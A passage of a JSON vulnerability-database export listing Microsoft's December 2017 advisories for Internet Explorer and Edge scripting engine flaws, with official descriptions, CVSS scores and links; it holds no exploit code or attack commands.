7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11889"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11889", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11889", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit the vulnerability, in a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nThe security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Internet Explorer Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11906", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11906", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11895"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11895", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11895", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11894"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11894", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11894", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11886", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11886", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11905"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11905", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11905", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11909"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11909", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11909", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11910"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11910", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11910", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11911"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11911", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11911", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11914"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11914", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11914", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11930", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11930", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11890"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11890", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11890", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11913"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11913", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11913", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11912"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11912", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11912", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the 